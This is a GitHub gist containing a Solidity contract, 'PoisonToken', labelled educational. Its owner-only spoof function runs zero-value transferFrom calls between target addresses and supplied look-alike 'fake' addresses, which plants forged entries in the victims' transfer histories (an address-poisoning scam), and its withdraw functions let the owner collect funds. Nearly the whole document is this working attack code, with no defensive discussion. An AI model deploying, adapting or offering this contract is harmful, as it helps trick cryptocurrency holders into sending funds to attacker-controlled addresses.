Skip to content

Instantly share code, notes, and snippets.

@jtriley-eth

jtriley-eth/PoisonToken.sol Secret

Last active January 18, 2023 23:22
Star
Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
Raw
PoisonToken.sol
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.17;
interface IERC20 {
function transfer(address receiver, uint256 amount) external returns (bool);
function transferFrom(address sender, address receiver, uint256 amount) external returns (bool);
}
/// @notice For Educational Purposes Only (duh).
contract PoisonToken {
error Auth();
error Arrays();
error TransferFail();
address internal immutable owner;
constructor() { owner = msg.sender; }
function withdrawToken(IERC20 token, address receiver, uint256 amount) external {
if (owner != msg.sender) revert Auth();
if (!token.transfer(receiver, amount)) revert TransferFail();
}
function withdraw(address receiver, uint256 amount) external {
if (owner != msg.sender) revert Auth();
(bool success,) = receiver.call{value: amount}("");
if (!success) revert TransferFail();
}
function spoof(IERC20 token, address[] calldata targets, address[] calldata fakes) external {
if (owner != msg.sender) revert Auth();
uint256 len = targets.length;
if (len != fakes.length) revert Arrays();
uint256 i;
unchecked {
for (i; i < len; ++i) {
address target = targets[i];
address fake = fakes[i];
if (!token.transferFrom(fake, target, 0)) revert TransferFail();
if (!token.transferFrom(target, fake, 0)) revert TransferFail();
}
}
}
receive() external payable {}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment